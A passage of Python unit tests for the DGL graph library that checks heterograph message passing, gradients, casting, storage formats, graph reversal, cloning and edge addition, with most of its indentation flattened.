g['user', 'plays', 'game'].pull(0, msg, red, apply)
y = g.nodes['game'].data['y']
assert F.array_equal(y[0], (x[0] + x[1]) * multiplier)
del g.nodes['game'].data['y']
# pushes from source (user) node 0
g['user', 'plays', 'game'].push(0, msg, red, apply)
y = g.nodes['game'].data['y']
assert F.array_equal(y[0], x[0] * multiplier)
del g.nodes['game'].data['y']
@parametrize_dtype
def test_backward(idtype):
g = create_test_heterograph(idtype)
x = F.randn((3, 5))
F.attach_grad(x)
g.nodes['user'].data['h'] = x
with F.record_grad():
g.multi_update_all(
{'plays' : (fn.copy_u('h', 'm'), fn.sum('m', 'y')),
'wishes': (fn.copy_u('h', 'm'), fn.sum('m', 'y'))},
'sum')
y = g.nodes['game'].data['y']
F.backward(y, F.ones(y.shape))
print(F.grad(x))
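    # every user has exactly two outgoing edges across 'plays' and 'wishes',
    # so each gradient entry is 2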
assert F.array_equal(F.grad(x), F.tensor([[2., 2., 2., 2., 2.],
[2., 2., 2., 2., 2.],
[2., 2., 2., 2., 2.]]))
@parametrize_dtype
def test_empty_heterograph(idtype):
def assert_empty(g):
assert g.number_of_nodes('user') == 0
assert g.number_of_edges('plays') == 0
assert g.number_of_nodes('game') == 0
# empty src-dst pair
assert_empty(dgl.heterograph({('user', 'plays', 'game'): ([], [])}))
g = dgl.heterograph({('user', 'follows', 'user'): ([], [])}, idtype=idtype, device=F.ctx())
assert g.idtype == idtype
assert g.device == F.ctx()
assert g.number_of_nodes('user') == 0
assert g.number_of_edges('follows') == 0
# empty relation graph with others
g = dgl.heterograph({('user', 'plays', 'game'): ([], []), ('developer', 'develops', 'game'):
([0, 1], [0, 1])}, idtype=idtype, device=F.ctx())
assert g.idtype == idtype
assert g.device == F.ctx()
assert g.number_of_nodes('user') == 0
assert g.number_of_edges('plays') == 0
assert g.number_of_nodes('game') == 2
assert g.number_of_edges('develops') == 2
assert g.number_of_nodes('developer') == 2
@parametrize_dtype
def test_types_in_function(idtype):
def mfunc1(edges):
assert edges.canonical_etype == ('user', 'follow', 'user')
return {}
def rfunc1(nodes):
assert nodes.ntype == 'user'
return {}
def filter_nodes1(nodes):
assert nodes.ntype == 'user'
return F.zeros((3,))
def filter_edges1(edges):
assert edges.canonical_etype == ('user', 'follow', 'user')
return F.zeros((2,))
def mfunc2(edges):
assert edges.canonical_etype == ('user', 'plays', 'game')
return {}
def rfunc2(nodes):
assert nodes.ntype == 'game'
return {}
def filter_nodes2(nodes):
assert nodes.ntype == 'game'
return F.zeros((3,))
def filter_edges2(edges):
assert edges.canonical_etype == ('user', 'plays', 'game')
return F.zeros((2,))
g = dgl.heterograph({('user', 'follow', 'user'): ((0, 1), (1, 2))},
idtype=idtype, device=F.ctx())
g.apply_nodes(rfunc1)
g.apply_edges(mfunc1)
g.update_all(mfunc1, rfunc1)
g.send_and_recv([0, 1], mfunc1, rfunc1)
g.push([0], mfunc1, rfunc1)
g.pull([1], mfunc1, rfunc1)
g.filter_nodes(filter_nodes1)
g.filter_edges(filter_edges1)
g = dgl.heterograph({('user', 'plays', 'game'): ([0, 1], [1, 2])}, idtype=idtype, device=F.ctx())
g.apply_nodes(rfunc2, ntype='game')
g.apply_edges(mfunc2)
g.update_all(mfunc2, rfunc2)
g.send_and_recv([0, 1], mfunc2, rfunc2)
g.push([0], mfunc2, rfunc2)
g.pull([1], mfunc2, rfunc2)
g.filter_nodes(filter_nodes2, ntype='game')
g.filter_edges(filter_edges2)
@parametrize_dtype
def test_stack_reduce(idtype):
#edges = {
# 'follows': ([0, 1], [1, 2]),
# 'plays': ([0, 1, 2, 1], [0, 0, 1, 1]),
# 'wishes': ([0, 2], [1, 0]),
# 'develops': ([0, 1], [0, 1]),
#}
g = create_test_heterograph(idtype)
g.nodes['user'].data['h'] = F.randn((3, 200))
def rfunc(nodes):
return {'y': F.sum(nodes.mailbox['m'], 1)}
def rfunc2(nodes):
return {'y': F.max(nodes.mailbox['m'], 1)}
def mfunc(edges):
return {'m': edges.src['h']}
g.multi_update_all(
{'plays' : (mfunc, rfunc),
'wishes': (mfunc, rfunc2)},
'stack')
assert g.nodes['game'].data['y'].shape == (g.number_of_nodes('game'), 2, 200)
# only one type-wise update_all, stack still adds one dimension
g.multi_update_all(
{'plays' : (mfunc, rfunc)},
'stack')
assert g.nodes['game'].data['y'].shape == (g.number_of_nodes('game'), 1, 200)
@parametrize_dtype
def test_isolated_ntype(idtype):
g = dgl.heterograph({
('A', 'AB', 'B'): ([0, 1, 2], [1, 2, 3])},
num_nodes_dict={'A': 3, 'B': 4, 'C': 4},
idtype=idtype, device=F.ctx())
assert g.number_of_nodes('A') == 3
assert g.number_of_nodes('B') == 4
assert g.number_of_nodes('C') == 4
g = dgl.heterograph({
('A', 'AC', 'C'): ([0, 1, 2], [1, 2, 3])},
num_nodes_dict={'A': 3, 'B': 4, 'C': 4},
idtype=idtype, device=F.ctx())
assert g.number_of_nodes('A') == 3
assert g.number_of_nodes('B') == 4
assert g.number_of_nodes('C') == 4
G = dgl.graph(([0, 1, 2], [4, 5, 6]), num_nodes=11, idtype=idtype, device=F.ctx())
G.ndata[dgl.NTYPE] = F.tensor([0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2], dtype=F.int64)
G.edata[dgl.ETYPE] = F.tensor([0, 0, 0], dtype=F.int64)
g = dgl.to_heterogeneous(G, ['A', 'B', 'C'], ['AB'])
assert g.number_of_nodes('A') == 3
assert g.number_of_nodes('B') == 4
assert g.number_of_nodes('C') == 4
@parametrize_dtype
def test_ismultigraph(idtype):
g1 = dgl.heterograph({('A', 'AB', 'B'): ([0, 0, 1, 2], [1, 2, 5, 5])},
{'A': 6, 'B': 6}, idtype=idtype, device=F.ctx())
assert g1.is_multigraph == False
g2 = dgl.heterograph({('A', 'AC', 'C'): ([0, 0, 0, 1], [1, 1, 2, 5])},
{'A': 6, 'C': 6}, idtype=idtype, device=F.ctx())
assert g2.is_multigraph == True
g3 = dgl.graph(((0, 1), (1, 2)), num_nodes=6, idtype=idtype, device=F.ctx())
assert g3.is_multigraph == False
g4 = dgl.graph(([0, 0, 1], [1, 1, 2]), num_nodes=6, idtype=idtype, device=F.ctx())
assert g4.is_multigraph == True
g = dgl.heterograph({
('A', 'AB', 'B'): ([0, 0, 1, 2], [1, 2, 5, 5]),
('A', 'AA', 'A'): ([0, 1], [1, 2])},
{'A': 6, 'B': 6}, idtype=idtype, device=F.ctx())
assert g.is_multigraph == False
g = dgl.heterograph({
('A', 'AB', 'B'): ([0, 0, 1, 2], [1, 2, 5, 5]),
('A', 'AC', 'C'): ([0, 0, 0, 1], [1, 1, 2, 5])},
{'A': 6, 'B': 6, 'C': 6}, idtype=idtype, device=F.ctx())
assert g.is_multigraph == True
g = dgl.heterograph({
('A', 'AB', 'B'): ([0, 0, 1, 2], [1, 2, 5, 5]),
('A', 'AA', 'A'): ([0, 0, 1], [1, 1, 2])},
{'A': 6, 'B': 6}, idtype=idtype, device=F.ctx())
assert g.is_multigraph == True
g = dgl.heterograph({
('A', 'AC', 'C'): ([0, 0, 0, 1], [1, 1, 2, 5]),
('A', 'AA', 'A'): ([0, 1], [1, 2])},
{'A': 6, 'C': 6}, idtype=idtype, device=F.ctx())
assert g.is_multigraph == True
@parametrize_dtype
def test_bipartite(idtype):
g1 = dgl.heterograph({('A', 'AB', 'B'): ([0, 0, 1], [1, 2, 5])},
idtype=idtype, device=F.ctx())
assert g1.is_unibipartite
assert len(g1.ntypes) == 2
assert g1.etypes == ['AB']
assert g1.srctypes == ['A']
assert g1.dsttypes == ['B']
assert g1.number_of_nodes('A') == 2
assert g1.number_of_nodes('B') == 6
assert g1.number_of_src_nodes('A') == 2
assert g1.number_of_src_nodes() == 2
assert g1.number_of_dst_nodes('B') == 6
assert g1.number_of_dst_nodes() == 6
assert g1.number_of_edges() == 3
g1.srcdata['h'] = F.randn((2, 5))
assert F.array_equal(g1.srcnodes['A'].data['h'], g1.srcdata['h'])
assert F.array_equal(g1.nodes['A'].data['h'], g1.srcdata['h'])
assert F.array_equal(g1.nodes['SRC/A'].data['h'], g1.srcdata['h'])
g1.dstdata['h'] = F.randn((6, 3))
assert F.array_equal(g1.dstnodes['B'].data['h'], g1.dstdata['h'])
assert F.array_equal(g1.nodes['B'].data['h'], g1.dstdata['h'])
assert F.array_equal(g1.nodes['DST/B'].data['h'], g1.dstdata['h'])
# more complicated bipartite
g2 = dgl.heterograph({
('A', 'AB', 'B'): ([0, 0, 1], [1, 2, 5]),
('A', 'AC', 'C'): ([1, 0], [0, 0])
}, idtype=idtype, device=F.ctx())
assert g2.is_unibipartite
assert g2.srctypes == ['A']
assert set(g2.dsttypes) == {'B', 'C'}
assert g2.number_of_nodes('A') == 2
assert g2.number_of_nodes('B') == 6
assert g2.number_of_nodes('C') == 1
assert g2.number_of_src_nodes('A') == 2
assert g2.number_of_src_nodes() == 2
assert g2.number_of_dst_nodes('B') == 6
assert g2.number_of_dst_nodes('C') == 1
g2.srcdata['h'] = F.randn((2, 5))
assert F.array_equal(g2.srcnodes['A'].data['h'], g2.srcdata['h'])
assert F.array_equal(g2.nodes['A'].data['h'], g2.srcdata['h'])
assert F.array_equal(g2.nodes['SRC/A'].data['h'], g2.srcdata['h'])
g3 = dgl.heterograph({
('A', 'AB', 'B'): ([0, 0, 1], [1, 2, 5]),
('A', 'AC', 'C'): ([1, 0], [0, 0]),
('A', 'AA', 'A'): ([0, 1], [0, 1])
}, idtype=idtype, device=F.ctx())
assert not g3.is_unibipartite
g4 = dgl.heterograph({
('A', 'AB', 'B'): ([0, 0, 1], [1, 2, 5]),
('C', 'CA', 'A'): ([1, 0], [0, 0])
}, idtype=idtype, device=F.ctx())
assert not g4.is_unibipartite
@parametrize_dtype
def test_dtype_cast(idtype):
g = dgl.graph(([0, 1, 0, 2], [0, 1, 1, 0]), idtype=idtype, device=F.ctx())
assert g.idtype == idtype
g.ndata["feat"] = F.tensor([3, 4, 5])
g.edata["h"] = F.tensor([3, 4, 5, 6])
    if idtype == F.int32:
g_cast = g.long()
assert g_cast.idtype == F.int64
else:
g_cast = g.int()
assert g_cast.idtype == F.int32
test_utils.check_graph_equal(g, g_cast, check_idtype=False)
def test_float_cast():
for t in [F.float16, F.float32, F.float64]:
idtype = F.int32
g = dgl.heterograph({
('user', 'follows', 'user'): (F.tensor([0, 1, 1, 2, 2, 3], dtype=idtype),
F.tensor([0, 0, 1, 1, 2, 2], dtype=idtype)),
('user', 'plays', 'game'): (F.tensor([0, 1, 1], dtype=idtype),
F.tensor([0, 0, 1], dtype=idtype))},
idtype=idtype, device=F.ctx())
uvalues = [1, 2, 3, 4]
gvalues = [5, 6]
fvalues = [7, 8, 9, 10, 11, 12]
pvalues = [13, 14, 15]
        dataNamesTypes = [
            ('a', F.float16),
            ('b', F.float32),
            ('c', F.float64),
            ('d', F.int32),
            ('e', F.int64)]
        for name, dtype in dataNamesTypes:
            g.nodes['user'].data[name] = F.copy_to(F.tensor(uvalues, dtype=dtype), ctx=F.ctx())
        for name, dtype in dataNamesTypes:
            g.nodes['game'].data[name] = F.copy_to(F.tensor(gvalues, dtype=dtype), ctx=F.ctx())
        for name, dtype in dataNamesTypes:
            g.edges['follows'].data[name] = F.copy_to(F.tensor(fvalues, dtype=dtype), ctx=F.ctx())
        for name, dtype in dataNamesTypes:
            g.edges['plays'].data[name] = F.copy_to(F.tensor(pvalues, dtype=dtype), ctx=F.ctx())
if t == F.float16:
g = dgl.transforms.functional.to_half(g)
if t == F.float32:
g = dgl.transforms.functional.to_float(g)
if t == F.float64:
g = dgl.transforms.functional.to_double(g)
        for name, origType in dataNamesTypes:
# integer tensors shouldn't be converted
reqType = t if (origType in [F.float16,F.float32,F.float64]) else origType
values = g.nodes['user'].data[name]
assert values.dtype == reqType
assert len(values) == len(uvalues)
assert F.allclose(values, F.tensor(uvalues), 0, 0)
values = g.nodes['game'].data[name]
assert values.dtype == reqType
assert len(values) == len(gvalues)
assert F.allclose(values, F.tensor(gvalues), 0, 0)
values = g.edges['follows'].data[name]
assert values.dtype == reqType
assert len(values) == len(fvalues)
assert F.allclose(values, F.tensor(fvalues), 0, 0)
values = g.edges['plays'].data[name]
assert values.dtype == reqType
assert len(values) == len(pvalues)
assert F.allclose(values, F.tensor(pvalues), 0, 0)
@parametrize_dtype
def test_format(idtype):
# single relation
g = dgl.graph(([0, 1, 0, 2], [0, 1, 1, 0]), idtype=idtype, device=F.ctx())
assert g.formats()['created'] == ['coo']
g1 = g.formats(['coo', 'csr', 'csc'])
assert len(g1.formats()['created']) + len(g1.formats()['not created']) == 3
g1.create_formats_()
assert len(g1.formats()['created']) == 3
assert g.formats()['created'] == ['coo']
    # multiple relations
g = dgl.heterograph({
('user', 'follows', 'user'): ([0, 1], [1, 2]),
('user', 'plays', 'game'): ([0, 1, 1, 2], [0, 0, 1, 1]),
('developer', 'develops', 'game'): ([0, 1], [0, 1])
}, idtype=idtype, device=F.ctx())
user_feat = F.randn((g['follows'].number_of_src_nodes(), 5))
g['follows'].srcdata['h'] = user_feat
g1 = g.formats('csc')
# test frame
assert F.array_equal(g1['follows'].srcdata['h'], user_feat)
# test each relation graph
assert g1.formats()['created'] == ['csc']
assert len(g1.formats()['not created']) == 0
# in_degrees
g = dgl.rand_graph(100, 2340).to(F.ctx())
ind_arr = []
for vid in range(0, 100):
ind_arr.append(g.in_degrees(vid))
in_degrees = g.in_degrees()
g = g.formats('coo')
for vid in range(0, 100):
assert g.in_degrees(vid) == ind_arr[vid]
assert F.array_equal(in_degrees, g.in_degrees())
@parametrize_dtype
def test_edges_order(idtype):
# (0, 2), (1, 2), (0, 1), (0, 1), (2, 1)
g = dgl.graph((
np.array([0, 1, 0, 0, 2]),
np.array([2, 2, 1, 1, 1])
), idtype=idtype, device=F.ctx())
print(g.formats())
src, dst = g.all_edges(order='srcdst')
assert F.array_equal(src, F.tensor([0, 0, 0, 1, 2], dtype=idtype))
assert F.array_equal(dst, F.tensor([1, 1, 2, 2, 1], dtype=idtype))
@parametrize_dtype
def test_reverse(idtype):
g = dgl.heterograph({
        ('user', 'follows', 'user'): ([0, 1, 2, 4, 3, 1, 3], [1, 2, 3, 2, 0, 0, 1]),
}, idtype=idtype, device=F.ctx())
gidx = g._graph
r_gidx = gidx.reverse()
assert gidx.number_of_nodes(0) == r_gidx.number_of_nodes(0)
assert gidx.number_of_edges(0) == r_gidx.number_of_edges(0)
g_s, g_d, _ = gidx.edges(0)
rg_s, rg_d, _ = r_gidx.edges(0)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
# force to start with 'csr'
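    # reversing swaps src and dst, so a CSR of the original corresponds to a CSC
    # of the reverse (checked via the 'created' formats below)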
gidx = gidx.formats('csr')
gidx = gidx.formats(['coo', 'csr', 'csc'])
r_gidx = gidx.reverse()
assert 'csr' in gidx.formats()['created']
assert 'csc' in r_gidx.formats()['created']
assert gidx.number_of_nodes(0) == r_gidx.number_of_nodes(0)
assert gidx.number_of_edges(0) == r_gidx.number_of_edges(0)
g_s, g_d, _ = gidx.edges(0)
rg_s, rg_d, _ = r_gidx.edges(0)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
# force to start with 'csc'
gidx = gidx.formats('csc')
gidx = gidx.formats(['coo', 'csr', 'csc'])
r_gidx = gidx.reverse()
assert 'csc' in gidx.formats()['created']
assert 'csr' in r_gidx.formats()['created']
assert gidx.number_of_nodes(0) == r_gidx.number_of_nodes(0)
assert gidx.number_of_edges(0) == r_gidx.number_of_edges(0)
g_s, g_d, _ = gidx.edges(0)
rg_s, rg_d, _ = r_gidx.edges(0)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
g = dgl.heterograph({
        ('user', 'follows', 'user'): ([0, 1, 2, 4, 3, 1, 3], [1, 2, 3, 2, 0, 0, 1]),
('user', 'plays', 'game'): ([0, 0, 2, 3, 3, 4, 1], [1, 0, 1, 0, 1, 0, 0]),
('developer', 'develops', 'game'): ([0, 1, 1, 2], [0, 0, 1, 1]),
}, idtype=idtype, device=F.ctx())
gidx = g._graph
r_gidx = gidx.reverse()
# metagraph
mg = gidx.metagraph
r_mg = r_gidx.metagraph
for etype in range(3):
assert mg.find_edge(etype) == r_mg.find_edge(etype)[::-1]
# three node types and three edge types
assert gidx.number_of_nodes(0) == r_gidx.number_of_nodes(0)
assert gidx.number_of_nodes(1) == r_gidx.number_of_nodes(1)
assert gidx.number_of_nodes(2) == r_gidx.number_of_nodes(2)
assert gidx.number_of_edges(0) == r_gidx.number_of_edges(0)
assert gidx.number_of_edges(1) == r_gidx.number_of_edges(1)
assert gidx.number_of_edges(2) == r_gidx.number_of_edges(2)
g_s, g_d, _ = gidx.edges(0)
rg_s, rg_d, _ = r_gidx.edges(0)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
g_s, g_d, _ = gidx.edges(1)
rg_s, rg_d, _ = r_gidx.edges(1)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
g_s, g_d, _ = gidx.edges(2)
rg_s, rg_d, _ = r_gidx.edges(2)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
# force to start with 'csr'
gidx = gidx.formats('csr')
gidx = gidx.formats(['coo', 'csr', 'csc'])
r_gidx = gidx.reverse()
# three node types and three edge types
assert 'csr' in gidx.formats()['created']
assert 'csc' in r_gidx.formats()['created']
assert gidx.number_of_nodes(0) == r_gidx.number_of_nodes(0)
assert gidx.number_of_nodes(1) == r_gidx.number_of_nodes(1)
assert gidx.number_of_nodes(2) == r_gidx.number_of_nodes(2)
assert gidx.number_of_edges(0) == r_gidx.number_of_edges(0)
assert gidx.number_of_edges(1) == r_gidx.number_of_edges(1)
assert gidx.number_of_edges(2) == r_gidx.number_of_edges(2)
g_s, g_d, _ = gidx.edges(0)
rg_s, rg_d, _ = r_gidx.edges(0)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
g_s, g_d, _ = gidx.edges(1)
rg_s, rg_d, _ = r_gidx.edges(1)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
g_s, g_d, _ = gidx.edges(2)
rg_s, rg_d, _ = r_gidx.edges(2)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
# force to start with 'csc'
gidx = gidx.formats('csc')
gidx = gidx.formats(['coo', 'csr', 'csc'])
r_gidx = gidx.reverse()
# three node types and three edge types
assert 'csc' in gidx.formats()['created']
assert 'csr' in r_gidx.formats()['created']
assert gidx.number_of_nodes(0) == r_gidx.number_of_nodes(0)
assert gidx.number_of_nodes(1) == r_gidx.number_of_nodes(1)
assert gidx.number_of_nodes(2) == r_gidx.number_of_nodes(2)
assert gidx.number_of_edges(0) == r_gidx.number_of_edges(0)
assert gidx.number_of_edges(1) == r_gidx.number_of_edges(1)
assert gidx.number_of_edges(2) == r_gidx.number_of_edges(2)
g_s, g_d, _ = gidx.edges(0)
rg_s, rg_d, _ = r_gidx.edges(0)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
g_s, g_d, _ = gidx.edges(1)
rg_s, rg_d, _ = r_gidx.edges(1)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
g_s, g_d, _ = gidx.edges(2)
rg_s, rg_d, _ = r_gidx.edges(2)
assert F.array_equal(g_s, rg_d)
assert F.array_equal(g_d, rg_s)
@parametrize_dtype
def test_clone(idtype):
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
g.ndata['h'] = F.copy_to(F.tensor([1, 1, 1], dtype=idtype), ctx=F.ctx())
g.edata['h'] = F.copy_to(F.tensor([1, 1], dtype=idtype), ctx=F.ctx())
new_g = g.clone()
assert g.number_of_nodes() == new_g.number_of_nodes()
assert g.number_of_edges() == new_g.number_of_edges()
assert g.device == new_g.device
assert g.idtype == new_g.idtype
assert F.array_equal(g.ndata['h'], new_g.ndata['h'])
assert F.array_equal(g.edata['h'], new_g.edata['h'])
# data change
new_g.ndata['h'] = F.copy_to(F.tensor([2, 2, 2], dtype=idtype), ctx=F.ctx())
assert (F.array_equal(g.ndata['h'], new_g.ndata['h']) == False)
g.edata['h'] = F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx())
assert (F.array_equal(g.edata['h'], new_g.edata['h']) == False)
# graph structure change
g.add_nodes(1)
assert g.number_of_nodes() != new_g.number_of_nodes()
new_g.add_edges(1, 1)
assert g.number_of_edges() != new_g.number_of_edges()
# zero data graph
g = dgl.graph(([], []), num_nodes=0, idtype=idtype, device=F.ctx())
new_g = g.clone()
assert g.number_of_nodes() == new_g.number_of_nodes()
assert g.number_of_edges() == new_g.number_of_edges()
# heterograph
g = create_test_heterograph3(idtype)
g.edges['plays'].data['h'] = F.copy_to(F.tensor([1, 2, 3, 4], dtype=idtype), ctx=F.ctx())
new_g = g.clone()
assert g.number_of_nodes('user') == new_g.number_of_nodes('user')
assert g.number_of_nodes('game') == new_g.number_of_nodes('game')
assert g.number_of_nodes('developer') == new_g.number_of_nodes('developer')
assert g.number_of_edges('plays') == new_g.number_of_edges('plays')
assert g.number_of_edges('develops') == new_g.number_of_edges('develops')
assert F.array_equal(g.nodes['user'].data['h'], new_g.nodes['user'].data['h'])
assert F.array_equal(g.nodes['game'].data['h'], new_g.nodes['game'].data['h'])
assert F.array_equal(g.edges['plays'].data['h'], new_g.edges['plays'].data['h'])
assert g.device == new_g.device
assert g.idtype == new_g.idtype
u, v = g.edges(form='uv', order='eid', etype='plays')
nu, nv = new_g.edges(form='uv', order='eid', etype='plays')
assert F.array_equal(u, nu)
assert F.array_equal(v, nv)
# graph structure change
u = F.tensor([0, 4], dtype=idtype)
v = F.tensor([2, 6], dtype=idtype)
g.add_edges(u, v, etype='plays')
u, v = g.edges(form='uv', order='eid', etype='plays')
assert u.shape[0] != nu.shape[0]
assert v.shape[0] != nv.shape[0]
assert g.nodes['user'].data['h'].shape[0] != new_g.nodes['user'].data['h'].shape[0]
assert g.nodes['game'].data['h'].shape[0] != new_g.nodes['game'].data['h'].shape[0]
assert g.edges['plays'].data['h'].shape[0] != new_g.edges['plays'].data['h'].shape[0]
@parametrize_dtype
def test_add_edges(idtype):
# homogeneous graph
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
u = 0
v = 1
g.add_edges(u, v)
assert g.device == F.ctx()
assert g.number_of_nodes() == 3
assert g.number_of_edges() == 3
u = [0]
v = [1]
g.add_edges(u, v)
assert g.device == F.ctx()
assert g.number_of_nodes() == 3
assert g.number_of_edges() == 4
u = F.tensor(u, dtype=idtype)
v = F.tensor(v, dtype=idtype)
g.add_edges(u, v)
assert g.device == F.ctx()
assert g.number_of_nodes() == 3
assert g.number_of_edges() == 5
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0, 1, 0, 0, 0], dtype=idtype))
assert F.array_equal(v, F.tensor([1, 2, 1, 1, 1], dtype=idtype))
# node id larger than current max node id
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
u = F.tensor([0, 1], dtype=idtype)
v = F.tensor([2, 3], dtype=idtype)
g.add_edges(u, v)
assert g.number_of_nodes() == 4
assert g.number_of_edges() == 4
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0, 1, 0, 1], dtype=idtype))
assert F.array_equal(v, F.tensor([1, 2, 2, 3], dtype=idtype))
# has data
g = dgl.graph(([0, 1], [1, 2]), idtype=idtype, device=F.ctx())
g.ndata['h'] = F.copy_to(F.tensor([1, 1, 1], dtype=idtype), ctx=F.ctx())
g.edata['h'] = F.copy_to(F.tensor([1, 1], dtype=idtype), ctx=F.ctx())
u = F.tensor([0, 1], dtype=idtype)
v = F.tensor([2, 3], dtype=idtype)
e_feat = {'h' : F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx()),
'hh' : F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx())}
g.add_edges(u, v, e_feat)
assert g.number_of_nodes() == 4
assert g.number_of_edges() == 4
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0, 1, 0, 1], dtype=idtype))
assert F.array_equal(v, F.tensor([1, 2, 2, 3], dtype=idtype))
assert F.array_equal(g.ndata['h'], F.tensor([1, 1, 1, 0], dtype=idtype))
assert F.array_equal(g.edata['h'], F.tensor([1, 1, 2, 2], dtype=idtype))
assert F.array_equal(g.edata['hh'], F.tensor([0, 0, 2, 2], dtype=idtype))
# zero data graph
g = dgl.graph(([], []), num_nodes=0, idtype=idtype, device=F.ctx())
u = F.tensor([0, 1], dtype=idtype)
v = F.tensor([2, 2], dtype=idtype)
e_feat = {'h' : F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx()),
'hh' : F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx())}
g.add_edges(u, v, e_feat)
assert g.number_of_nodes() == 3
assert g.number_of_edges() == 2
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0, 1], dtype=idtype))
assert F.array_equal(v, F.tensor([2, 2], dtype=idtype))
assert F.array_equal(g.edata['h'], F.tensor([2, 2], dtype=idtype))
assert F.array_equal(g.edata['hh'], F.tensor([2, 2], dtype=idtype))
# bipartite graph
g = dgl.heterograph({('user', 'plays', 'game'): ([0, 1], [1, 2])},
idtype=idtype, device=F.ctx())
u = 0
v = 1
g.add_edges(u, v)
assert g.device == F.ctx()
assert g.number_of_nodes('user') == 2
assert g.number_of_nodes('game') == 3
assert g.number_of_edges() == 3
u = [0]
v = [1]
g.add_edges(u, v)
assert g.device == F.ctx()
assert g.number_of_nodes('user') == 2
assert g.number_of_nodes('game') == 3
assert g.number_of_edges() == 4
u = F.tensor(u, dtype=idtype)
v = F.tensor(v, dtype=idtype)
g.add_edges(u, v)
assert g.device == F.ctx()
assert g.number_of_nodes('user') == 2
assert g.number_of_nodes('game') == 3
assert g.number_of_edges() == 5
u, v = g.edges(form='uv')
assert F.array_equal(u, F.tensor([0, 1, 0, 0, 0], dtype=idtype))
assert F.array_equal(v, F.tensor([1, 2, 1, 1, 1], dtype=idtype))
# node id larger than current max node id
g = dgl.heterograph({('user', 'plays', 'game'): ([0, 1], [1, 2])},
idtype=idtype, device=F.ctx())
u = F.tensor([0, 2], dtype=idtype)
v = F.tensor([2, 3], dtype=idtype)
g.add_edges(u, v)
assert g.device == F.ctx()
assert g.number_of_nodes('user') == 3
assert g.number_of_nodes('game') == 4
assert g.number_of_edges() == 4
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0, 1, 0, 2], dtype=idtype))
assert F.array_equal(v, F.tensor([1, 2, 2, 3], dtype=idtype))
# has data
g = dgl.heterograph({
('user', 'plays', 'game'): ([0, 1], [1, 2])
}, idtype=idtype, device=F.ctx())
g.nodes['user'].data['h'] = F.copy_to(F.tensor([1, 1], dtype=idtype), ctx=F.ctx())
g.nodes['game'].data['h'] = F.copy_to(F.tensor([2, 2, 2], dtype=idtype), ctx=F.ctx())
g.edata['h'] = F.copy_to(F.tensor([1, 1], dtype=idtype), ctx=F.ctx())
u = F.tensor([0, 2], dtype=idtype)
v = F.tensor([2, 3], dtype=idtype)
e_feat = {'h' : F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx()),
'hh' : F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx())}
g.add_edges(u, v, e_feat)
assert g.number_of_nodes('user') == 3
assert g.number_of_nodes('game') == 4
assert g.number_of_edges() == 4
u, v = g.edges(form='uv', order='eid')
assert F.array_equal(u, F.tensor([0, 1, 0, 2], dtype=idtype))
assert F.array_equal(v, F.tensor([1, 2, 2, 3], dtype=idtype))
assert F.array_equal(g.nodes['user'].data['h'], F.tensor([1, 1, 0], dtype=idtype))
assert F.array_equal(g.nodes['game'].data['h'], F.tensor([2, 2, 2, 0], dtype=idtype))
assert F.array_equal(g.edata['h'], F.tensor([1, 1, 2, 2], dtype=idtype))
assert F.array_equal(g.edata['hh'], F.tensor([0, 0, 2, 2], dtype=idtype))
# heterogeneous graph
g = create_test_heterograph3(idtype)
u = F.tensor([0, 2], dtype=idtype)
v = F.tensor([2, 3], dtype=idtype)
g.add_edges(u, v, etype='plays')
assert g.number_of_nodes('user') == 3
assert g.number_of_nodes('game') == 4
assert g.number_of_nodes('developer') == 2
assert g.number_of_edges('plays') == 6
assert g.number_of_edges('develops') == 2
u, v = g.edges(form='uv', order='eid', etype='plays')
assert F.array_equal(u, F.tensor([0, 1, 1, 2, 0, 2], dtype=idtype))
assert F.array_equal(v, F.tensor([0, 0, 1, 1, 2, 3], dtype=idtype))
assert F.array_equal(g.nodes['user'].data['h'], F.tensor([1, 1, 1], dtype=idtype))
assert F.array_equal(g.nodes['game'].data['h'], F.tensor([2, 2, 0, 0], dtype=idtype))
assert F.array_equal(g.edges['plays'].data['h'], F.tensor([1, 1, 1, 1, 0, 0], dtype=idtype))
# add with feature
e_feat = {'h': F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx())}
u = F.tensor([0, 2], dtype=idtype)
v = F.tensor([2, 3], dtype=idtype)
g.nodes['game'].data['h'] = F.copy_to(F.tensor([2, 2, 1, 1], dtype=idtype), ctx=F.ctx())
g.add_edges(u, v, data=e_feat, etype='develops')
assert g.number_of_nodes('user') == 3
assert g.number_of_nodes('game') == 4
assert g.number_of_nodes('developer') == 3
assert g.number_of_edges('plays') == 6
assert g.number_of_edges('develops') == 4
u, v = g.edges(form='uv', order='eid', etype='develops')
assert F.array_equal(u, F.tensor([0, 1, 0, 2], dtype=idtype))
assert F.array_equal(v, F.tensor([0, 1, 2, 3], dtype=idtype))
